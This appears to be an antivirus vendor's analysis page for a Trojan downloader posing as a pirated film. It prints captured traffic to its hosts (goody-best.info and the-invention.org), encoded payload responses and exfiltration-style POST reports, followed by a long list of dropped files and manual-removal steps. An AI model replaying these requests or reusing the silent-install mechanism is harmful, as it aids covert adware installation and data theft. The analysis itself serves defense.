T..Content-Type: application/octet-stream..Content-Length: 3439893..La
st-Modified: Thu, 18 Jun 2015 08:40:11 GMT..Connection: close..ETag: "
558283eb-347d15"..Accept-Ranges: bytes..



GET /?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:05 GMT
Content-Type: text/html
Content-Length: 8292
Connection: close
Content-Disposition: attachment; filename="4_1.txt"
..O.b.r.3.F.i.k.2.0.T.6.U.L.O.z.0.R.J.Q.D.P.l.8.c.T.j.Q.g.a.I.D.6. .Q.
B.X.j.9.b.6.t.B.W.f.D.g.t.3.b.q.J.w.H.g.o.O.a.N.J.O.z.w.p.B.a.r.n.u.Y.
W.c.N.n.t.c.W.c.c.o.M.O./.0.I.r.r.1.l.s.V.y.3.Y.l./.8.G.a.O.n./.h.O.e.
U.9.9.2.G.B.x.V.9.f.J.s.A.e.F.e.u.W.I.H.u.h.a.a.j.J.6.T.E.f.f.G.m.A.o.
j.a.t.6.q.N.T.9.1.R.8.X.y.d.L.K.N.A.k.I.I.T.A.W.W.0.X.i.Y.F.i.A.G.p.f.
X.k.R.y.6.N.H.3.t. .J.O.7./.T.d.C.X.K.0.w. .q.H.o.K.h.R.A.m.m.D.t.m.J.
N.o.8.K.Y.h.b.K.H.s.K.y.v.n.i.h.O.H.G.K.9.i.e.w.F.S.Z.S.p.h.X.V.T.R.t.
T./.x.s.H.v.n.f.x.m.E.X.Q.m.C.W.R.S.b.o.H./.Z.i.b.O.C.w.n.V.D./.I.7.c.
 .A.L.H.Z.7.S.e.M. .H.P.o.N.D.W.G.F.8.d.v.e.7.v.j.u.X.V.P.x.X.l.W.e.P.
 .h.X.x.A.V.Y.t.u.W.2.l.F.t.s.V.V.V.6.N.x.5.4.L.G. .k.4.w.M.3.U.I.k.P.
 . .J.4.d.g.D.8.6.l.z.n.7.A.g.O. .l.D.I.b.B.n.3.V.S.V.l.P.8.W.N.h.c.s.
j.k.1.Y.A.8.9.y.V.H.m.g.T.2. .C.O.Z.A.M.I.H.r.a.1.X.P.2.N.f.6.c.l.d.z.
1.Z.6.q.a.T.k.A.P.h.x.I.y.A.0.j.S.R.B.N.S.d.I.u.u.h.m.z.x.l.d.T.d.N.0.
O.o.y.i.v.W.g.s.p.6.M.4.M.h.R.Y.m.d.S.4.i.K.2.1.o.K.3.q.t. .g.z.b.N.W.
8.P.z.l.l.7.6.g.1.X.D.5.p.l.6.s.7.S.x.G.f.s.x.P.p.x.H.1./.B.k.X.H.H.w.
m.m.z.T.y.O.0.m.S.a. .Y.z.K.w.Z.9.q.Q.e.u.L.9.H.X.2.x.O./.A.D.g.o.4.o.
N.K.1.L.W.u.r.T.W.1.C.x.z.V.O.f.K.c.c.0.H.G.o.V.7.k.P.8.8.I.h.T.c.1.b.
S.8.X.C.E.b.1.X.w.K.p.G.b.U.P.o.i.D.b.t.M.s.k.a.j.v.I.h.b.a.E.h.l.n.Z.
E.z.V.T.d.A.w.5.6. .5.0.W.o.I.3.L.y.v.N.A.H.O.J.q.J.W.m.f.K.e.A.I.v.k.
O.a.P.Q.2.0.Z.S.y.g.B.L.7./.z.9.1.C.O.G.N.w.O.z.J.N.1.E.7.5.g.I.h.I.K.
s. .l.e.N.v.c.Z.0.7.a.I.S.X.T.k.v./.q.C.m.p.S.A.9.K./.g.D.v.Y.N./.X.0.
x.G.f.4.8.D.e.h.s.u.W.r.c.x.Q.D.y.O.M.p.e.s.g.S.M.l.v.M.L.D.r.V.X.
<<< skipped >>>


POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5922
Cache-Control: no-cache

data=qhcYUBOKdgCLOYSUMOhhU&report=jN8R3Ac9OgScSS1JLF/3jtm7mnRiJUrNKJKIDxUWpfEoUQ4J8kf8cQ7JkXJk5e8Zu7VSXiCoZFu4sczsdTuhwVfBO/ztm2TpmiYcyZdyHB68A6kKbaDTeq7nG3KA1chT8NE59WpFTcW VSWv66cxat2bz4JSTBSKEG1O13Uy3CQjCE4E270cbIYb7wNTEFujhenU5/29f8b5qOQM0iLpWE4ClGC2nT3izFhh Q1ZPVWxpGrk0DqrytN9P36MPdE60qpG2LvwI6Gt8KlUlTU1ZlD k4Iooprj8kBWbF18Hq7h9/iQBqCYSGoT90ZeuOrgBQQRy5zINUonT12IPTlPVj3VEZoOIc23y8iI4p75qqaKJVgw8igKCBhZ3UTcqTDepYb0Prf9rew3gLc0d0IpsAgv4Gzqif52/a0AaSy0t5DIEDnXt1CzVHl6LL7/zGy40xoIfUuIiKnc0x1I8l/WP7YyY3eQUmfSfjLWPF923lKjVy0xHNAyojCOCoZGfvSiYotCeQr5e6KnzmiKyMakKOdunwoFchcFIM23CmM3BngWK4V8 Ch5uOKqzoY6WchJlzxht1dxReAfys3pWas51wVDDQ3vAmettU/q40Ih5A8DkUiM3muL IOIRazpMBMI xNK2h2XEe6m8qi4SuXgi26KRYvg1u7OnHS4dl8k9EmujmAfx3y1cu5WiGRb Mq5EbVdja/qd0alFmAZQ812a02AE7vSptfe1iWyXi xak6FUzGAgdY2WtA84vyrI3GNVpPE28abUGOKzxGZ6bni/iTegMnQF/6aSoUcqw4 R6kIVrN9kOPXk9DNS5s47YnGWXTCKPDHugdfWp31Jsji5vggk3iKNhE6Oo2HxTztFW4vG9COhEYDJEr1PKMnZJtufsT6jnaAZ4fDJLcja04cqSXApCwYmGxUxKjFKOw4aXSekZ1XmL3 0qQPvsh3tc 3piBjm8QXIxlGiwUtk gt8QXaIou0I1JsCi5m/dUG/i6Bx5cexsOe4rcY667KsLRZeraT8jIutxpx42FYJ/U19xaGA/o0vnVnQ1N6gkc1oqXp8qhPlhagmr3WzvnNtV0hgA3SYyDm6HXN/DQ 1MT1VdkXj8cAG6tunRWsrWdif1msUwxhWWzN2SfRDWz7bpZFDkN cEbpch3epFK7wzTyCROAfMPos4EDcJn8e3AZcCYFHxKDEtn veEuFX3k/b1zIJA/iEkz RQg0qXnd7I8wd9dXv5m9J Q1NnUEsLCfrGoHedLGWxPCJAz
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:17 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5894
Cache-Control: no-cache

data=tYVyuHeBHFqO123456wKW&report=NoTw8vkdBiAq45rpniL0qPoO2bms2f/VMQsXgjfYWG82WyOr6niAS1/gNW47vU/GIOPGB0YR83uereBsdmkekOKm3j zS4ZaL9Xq Ukc3Flnh9iPw3Hnoc9kxrdamFtlX3t4fZFUaVbSb0vCnrKybw iMSqUP64rIVQsacWFiKmlDlxstGskUKlGr7lD4V1ikB7dXHkt7VJzvVnn9N53TyKKCn1B215SYOp81xkUXyaW7qHn4T61kzTS CaonJXJkaTbNnfuzZ6gX8IEkyzOh7QYwy29ARqQWaJhwuI1B5d1ZgO5pZJJIVP6qHENZqGe4lHxeLX5jnDwuTZpKzs YYl2zGF3h1gn oxWPjDFDskCsc8gFH7IcbkT51WsVFGqAcQe2aL4aL3PFpyTaDpwVjz271G7D8gfU7/LdXej61uQSREccUnXwfN7FFng4fbzPyhaqJKl/ovqs7dgMG03kLdg9W/Dxfwx2RL/DBefA2yAZp0v8rI3RCH8SYNzPg4vnMTf7v ljJR/zra3zkh3PYoVUG1FDXtvyWJePEfqc0R4qhSgMn8fY6IAOSAWvK1vRDnPNkK49rfCHQ1o6UTMH3CcfCoSv1L0ZXRhvRwRTG6L7bIehkJ4OTbrfQS1hTyQbcy400GmhXawJm2Q2ze3eGjPEoEpOBqJfhQsFbEjupeYzZKhH/yhfnd2e1W8J6W9Z5tCzPSjh4Jg6OYD77yoO7U8e8s8U6B5DQ uW5TGRIMeQzvrbjuh7ThvLw465DOPMqwi76soxpkynQHCFbDzvidt5VMjXg5aO4uKqvB jjyQGFGwvGQ0uxXJMY0J8n8 iUhtcsZ0doRpNCz88243Uh/VBYaftroiFza52tLFDBfr54fNkulUDAT4Qe1JXJgWelZD5BhTR7wOp4OHAq5zQWj W/SdLsrTOVP/Ft8fb7mXqIb5TE228DRYJ8DHs3/2RjPNLsNUYD0kmuYiqO G9Im2dRw5yv/1GVll9rm9Xqnh0YeAbBEXF5DcZWxmGOLp3KhlG XxWdqAD8rpYSqudr7tLQBPjlhk7ma6cMNT6waLUO95ieFT7mbu4YWwbOZ2c3NfCe77wyXoG7pkcSvZqJUYZsu4m2NGQE/TUGeVwkNywrVBOSYeujc49eDNjmb63CT8NilJCfy8e6RKVYNtCMFTIha37CvXNvfGp2LmtWSDW49NgxC6fLOcxzHmhfycsmJht7l3c02OB9FImM11lXd1d5pKc6mgAU7IsGG1VTdKxi/RhS8qqlhM
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:59 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:04 GMT
Content-Type: text/html
Content-Length: 8316
Connection: close
Content-Disposition: attachment; filename="3.txt"
..i.z.m.f.x.h.Q.L.t.a.C.h.g.q.W.l.h.a.u.g.C.w.7.l.V.z.L.u.e.H.U.m.X./.
D.D.k.H.V.0.y.a.Z.p.H.z.c.r.X.I.M.G.r.p.a.v.r.9.f./.H.6.t.C.F.b.d.K.a.
K.t.f.3.w.a.E.W.g.1.H.q.F.E.K.H.7.c.n.V.W.O./.o.Y.6.Q.j.K.j.R.n.m.5.U.
e.U.k.O.Y.s.k.L.D.7.R.9.c.I.H./.6.x.z.K.Y.6.P.K.Y.U.J.l.l.I.e.M.B.U.W.
Z.i.Z.H.8.X.k.0.M.z.y.g.N.v.Z.p.N.E.1.o.C.k.h.9.8.k.F.i.T.k./.Q.e.J.Z.
c.c.h.N.G.d.L.K.n.7.A.T.8.n.k.Z.E.C./.g.9.a.v.H.R.B.l.t.R.M.O.s.V.d.C.
 .G.p.L.w.P.M.u.C.x.Y.W.6.8.T.c.o.m./.r.Y.J.e.X.r.2.3.B.a.4.8.H.n./.F.
v.N.H.X.k.x.c.Z.d.W.q.9.F.A.w.w.P.D.A.Y.T.X.d.6.k.8.O.q.5. .O.g.d.M. .
s.5.4.g.H.2.R.U.y.j.R.J.w.t.X.b.Q.9./.h.t.5.B.w.8.6.z.V.E.x.4.w.N.l.u.
R.O./.p.f.k.k.Q.2.J.A.W.B.D.Z.E.J.R.0.S.G.P.n.L. .a.W.w.q.O.0.w.E.q.v.
9./.s.2.f.P.F.B.h.C.e.2.O.U.K.X.W.E.p.I.q.5.h.m.l.3.8.P.9.7.Y.O.w.C.l.
e.Z.G.S.Q.n.i.v.l.O.y.0.m.F.Q.d.H.W.I.v.Q.B.V.5.l.5./.J.v.P.C.g.y.u.N.
K.p.R.7.D.Y.s.P.C.Q.1.a.u.C.L.n.B.J.T.D.M.d.W.m.Y.H.w.b.T.n.O.d.c.p.B.
W.E.o.B.Q.O.A.X.S.P.7.e./.I.K.D.6.O.9.m.p.9.Z.q.S.G.f.p.r.g.K.7.f.s.K.
l.O.F.m.Z.u.e. .8. .A.i.2.X.d.2.7.F.h.i.Z.E.f.N. .x.l.W.R.h.J.P.0.P.L.
d.E.q.0.P.H.y.C.J.k.r.p.y.g.B.g.0.U.1.4.k.u.M.5.e.g.k.Z.b.0.S.d.W.p.t.
U.r.Y.A.8.4.X.2.R.f.O.u.B.u.d.w.6.A.Y.j.n.k.m.y.S.Y.Z.d.3.K.2.M.O.a.k.
3.i./.w.q.X.j.M.H.o.X.E.X.J.3.O.o.S.3.j.0.4.D.b.G.s.d.L.K.6.s.Z.j.F.g.
X.2./.S.y.C.s.1.L.y.h.b.c.M.N.j.O.o.l.3.B.8.M.0.g.F.R.m.7./.3.c.s.m.Z.
1.f.S.P.J.M. .A.z.0. .A.K.4.Z.n.s.I.x.4.9.0.G.y.C.Z.y.S.t.j.y. .9.F. .
f.O.k.T.H.B.h.S.5.f.D.d.q.M.O.9.n.O.V.v.T.h.f.q.g.s.V.3.O.c.h.H.g.m.W.
h.s.w.w.1.g.7.B.8.2.Q.c.N.y.c.v.4.f.u.L.d.u.i.q.l.U.d.w.N.E.Y.h.A.
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







rundll32.exe_1016:




.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:1304
    %original file name%.exe:996
    %original file name%.exe:592
    %original file name%.exe:1936
    %original file name%.exe:440
    NybbleCrawler.xyz.exe:356
    rundll32.exe:1256
    regsvr32.exe:2008
    regsvr32.exe:1784
    hpds_setup.exe:164
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_4.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_3.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\8[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\progressbar.gif (15 bytes)
    %WinDir%\Tasks\Bidaily Synchronize Task[973b].job (450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_5.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\6_1_3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_3_1[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_1_1.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\%original file name%.exe (8816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_3[1].txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_1_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3_1.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Desktop\52eea08e054915129f2638d8012a38f6.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\3.ini.txt (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_1_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1_2.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\7_1[1].txt (392 bytes)
    %Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\%original file name%.exe (8816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\bg.ca.part (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_2.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task.ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7_3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(2).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\3.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\steps\7.ini.txt (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1_4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\5.ini.tmp (14 bytes)
    %Documents and Settings%\All Users\Application Data\{76f98d01-d66f-efbc-76f9-98d01d663407}\52eea08e054915129f2638d8012a38f6.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\6_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\7_5[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7_3.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_2_1.ini.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6.ini.tmp (1184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(4).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_1[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\4_3.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\6_1.ini.tmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\8.ini.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\5[1].txt (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\7.ini.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe (27635 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1F50\temp\task(3).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\4_2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\6_2_1[1].txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\loader.gif (2 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll (6693 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\820cb716dd7864a479458114e3582eab.ini (514 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb (13 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.dat (42 bytes)
    %Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dB1XJloRgbF4Qw[1].ca (133377 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6D10\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3b805d70\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2ea510b5\temp.ca.part (119356 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\r1.the-invention[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\290e9ce2\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\g7CyPVZagCsRV8[1].ca (134158 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb (13 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe (3572 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll (6693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5E80\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0284a4af\temp.ca.part (153797 bytes)
    %Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dat (44 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\e605d3cdf72e06d079458114e3582eab.ini (512 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\DAE0\images\loader.gif (2 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\9b4263a9124509d379458114e3582eab.ini (297 bytes)
    %Program Files%\CutaThePrice\CutaThePrice.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0903733f\temp.ca.part (24208 bytes)
    %Program Files%\CutaThePrice\CutaThePrice.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1829a50e\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\hVwDePRrG2aSqC[1].ca (35544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\fyBYRfMAYKA66R[1].ca (33816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2e71167f\temp.ca.part (6 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\bab831a24b139eab79458114e3582eab.ini (328 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\loader.gif (2 bytes)
    %Program Files%\Web Protector  Reliable Phishing Protection\Web Protector  Reliable Phishing Protection.exe (3572 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1993275e\temp.ca.part (29136 bytes)
    %Program Files%\Web Protector  Reliable Phishing Protection\Web Protector  Reliable Phishing Protection.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\FF0\images\progressbar.gif (15 bytes)
    %Program Files%\TerminusKeeper\TerminusKeeper.dll (189078 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf071a6d8c.dll (20506 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 

  5. Reboot the computer.
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now